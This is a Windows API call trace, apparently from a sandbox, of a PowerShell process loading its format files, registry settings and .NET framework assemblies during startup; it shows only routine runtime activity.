	[0158.998] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0158.998] RegCloseKey (hKey=0x320) returned 0x0
	[0158.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.998] GetLastError () returned 0x0
	[0158.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.998] GetLastError () returned 0x0
	[0159.030] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xd9046651, Data2=0x45c2, Data3=0x4b5b, Data4=([0]=0x9b, [1]=0x2c, [2]=0x24, [3]=0x2d, [4]=0x79, [5]=0x81, [6]=0xb2, [7]=0x6a))) returned 0x0
	[0159.116] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x4d5c9b8c, Data2=0xc2a, Data3=0x4dbf, Data4=([0]=0xba, [1]=0x5a, [2]=0x11, [3]=0x40, [4]=0x3b, [5]=0x58, [6]=0xa1, [7]=0x89))) returned 0x0
	[0159.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.118] GetLastError () returned 0x0
	[0159.118] SetErrorMode (uMode=0x1) returned 0x1
	[0159.118] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0159.118] GetLastError () returned 0x0
	[0159.118] GetFileType (hFile=0x320) returned 0x1
	[0159.118] SetErrorMode (uMode=0x1) returned 0x1
	[0159.118] GetFileType (hFile=0x320) returned 0x1
	[0159.119] ReadFile (in: hFile=0x320, lpBuffer=0x2e22990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e22990*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.120] GetLastError () returned 0x0
	[0159.121] ReadFile (in: hFile=0x320, lpBuffer=0x2e22990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e22990*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.121] GetLastError () returned 0x0
	[0159.122] ReadFile (in: hFile=0x320, lpBuffer=0x2e22990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e22990*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.122] GetLastError () returned 0x0
	[0159.122] ReadFile (in: hFile=0x320, lpBuffer=0x2e22990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e22990*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.122] GetLastError () returned 0x0
	[0159.123] ReadFile (in: hFile=0x320, lpBuffer=0x2e22990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e22990*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.123] GetLastError () returned 0x0
	[0159.124] ReadFile (in: hFile=0x320, lpBuffer=0x2e22990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e22990*, lpNumberOfBytesRead=0x14e354*=0xfb2, lpOverlapped=0x0) returned 1
	[0159.124] GetLastError () returned 0x0
	[0159.124] ReadFile (in: hFile=0x320, lpBuffer=0x2e220e2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e220e2*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0159.124] GetLastError () returned 0x0
	[0159.124] ReadFile (in: hFile=0x320, lpBuffer=0x2e22990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e22990*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0159.124] GetLastError () returned 0x0
	[0159.124] CloseHandle (hObject=0x320) returned 1
	[0159.124] GetLastError () returned 0x0
	[0159.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.124] GetLastError () returned 0x0
	[0159.124] SetErrorMode (uMode=0x1) returned 0x1
	[0159.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e43220 | out: lpFileInformation=0x2e43220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0159.125] GetLastError () returned 0x0
	[0159.125] SetErrorMode (uMode=0x1) returned 0x1
	[0159.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.125] GetLastError () returned 0x0
	[0159.125] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x320) returned 0x0
	[0159.125] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
	[0159.125] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0159.125] RegCloseKey (hKey=0x320) returned 0x0
	[0159.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.125] GetLastError () returned 0x0
	[0159.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.125] GetLastError () returned 0x0
	[0159.127] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x6c87d82a, Data2=0x7aa, Data3=0x42b7, Data4=([0]=0xa4, [1]=0x73, [2]=0x50, [3]=0xf1, [4]=0xf0, [5]=0x88, [6]=0xa, [7]=0x70))) returned 0x0
	[0159.137] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x45fa5bac, Data2=0x8112, Data3=0x47b6, Data4=([0]=0xb1, [1]=0xd9, [2]=0x5d, [3]=0xb1, [4]=0xe7, [5]=0x7f, [6]=0x68, [7]=0xce))) returned 0x0
	[0159.142] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb67b1e2e, Data2=0xe269, Data3=0x4e48, Data4=([0]=0xbd, [1]=0xb6, [2]=0xb1, [3]=0xc, [4]=0xbc, [5]=0x67, [6]=0x46, [7]=0xd1))) returned 0x0
	[0159.142] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3c67392d, Data2=0x66de, Data3=0x4a9e, Data4=([0]=0x85, [1]=0x10, [2]=0xdb, [3]=0xd4, [4]=0x2d, [5]=0xb9, [6]=0x7e, [7]=0x37))) returned 0x0
	[0159.143] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb7917d43, Data2=0x458a, Data3=0x49d5, Data4=([0]=0x8e, [1]=0xec, [2]=0xc2, [3]=0x1, [4]=0x38, [5]=0xba, [6]=0x3f, [7]=0xf1))) returned 0x0
	[0159.143] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xdb738b4, Data2=0x2c15, Data3=0x4f95, Data4=([0]=0x8f, [1]=0x18, [2]=0xf7, [3]=0x86, [4]=0x95, [5]=0x5d, [6]=0x2d, [7]=0xed))) returned 0x0
	[0159.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.143] GetLastError () returned 0x0
	[0159.143] SetErrorMode (uMode=0x1) returned 0x1
	[0159.143] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0159.143] GetLastError () returned 0x0
	[0159.143] GetFileType (hFile=0x320) returned 0x1
	[0159.143] SetErrorMode (uMode=0x1) returned 0x1
	[0159.144] GetFileType (hFile=0x320) returned 0x1
	[0159.144] ReadFile (in: hFile=0x320, lpBuffer=0x2e62bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62bc8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.508] GetLastError () returned 0x0
	[0159.509] ReadFile (in: hFile=0x320, lpBuffer=0x2e62bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62bc8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.537] GetLastError () returned 0x0
	[0159.538] ReadFile (in: hFile=0x320, lpBuffer=0x2e62bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62bc8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.538] GetLastError () returned 0x0
	[0159.538] ReadFile (in: hFile=0x320, lpBuffer=0x2e62bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62bc8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.538] GetLastError () returned 0x0
	[0159.539] ReadFile (in: hFile=0x320, lpBuffer=0x2e62bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62bc8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.539] GetLastError () returned 0x0
	[0159.539] ReadFile (in: hFile=0x320, lpBuffer=0x2e62bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62bc8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0159.539] GetLastError () returned 0x0
	[0159.539] ReadFile (in: hFile=0x320, lpBuffer=0x2e62bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62bc8*, lpNumberOfBytesRead=0x14e354*=0xaca, lpOverlapped=0x0) returned 1
	[0159.539] GetLastError () returned 0x0
	[0159.539] ReadFile (in: hFile=0x320, lpBuffer=0x2e62232, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62232*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0159.539] GetLastError () returned 0x0
	[0159.539] ReadFile (in: hFile=0x320, lpBuffer=0x2e62bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2e62bc8*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0159.539] GetLastError () returned 0x0
	[0159.539] CloseHandle (hObject=0x320) returned 1
	[0159.589] GetLastError () returned 0x0
	[0159.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.589] GetLastError () returned 0x0
	[0159.589] SetErrorMode (uMode=0x1) returned 0x1
	[0159.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e83bc4 | out: lpFileInformation=0x2e83bc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0159.589] GetLastError () returned 0x0
	[0159.589] SetErrorMode (uMode=0x1) returned 0x1
	[0159.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.589] GetLastError () returned 0x0
	[0159.589] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x320) returned 0x0
	[0159.590] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
	[0159.590] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0159.590] RegCloseKey (hKey=0x320) returned 0x0
	[0159.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.590] GetLastError () returned 0x0
	[0159.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.590] GetLastError () returned 0x0
	[0159.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0159.607] GetLastError () returned 0x0
	[0159.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0159.610] GetLastError () returned 0x57
	[0159.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0159.751] GetLastError () returned 0x57
	[0159.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0159.759] GetLastError () returned 0x57
	[0159.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0159.777] GetLastError () returned 0x57
	[0159.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0159.788] GetLastError () returned 0x57
	[0159.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0159.915] GetLastError () returned 0x57
	[0159.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0159.917] GetLastError () returned 0x57
	[0159.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0159.926] GetLastError () returned 0x57
	[0160.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0160.196] GetLastError () returned 0x57
	[0160.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0160.207] GetLastError () returned 0x57
	[0160.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0160.220] GetLastError () returned 0x57
	[0160.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0160.309] GetLastError () returned 0x57
	[0160.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0160.312] GetLastError () returned 0x57
	[0160.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0160.368] GetLastError () returned 0x57
	[0160.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0160.370] GetLastError () returned 0x57
	[0160.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0160.370] GetLastError () returned 0x57
	[0160.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0160.371] GetLastError () returned 0x57
	[0160.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.371] GetLastError () returned 0x57
	[0160.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.371] GetLastError () returned 0x57
	[0160.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.371] GetLastError () returned 0x57
	[0160.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.371] GetLastError () returned 0x57
	[0160.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.372] GetLastError () returned 0x57
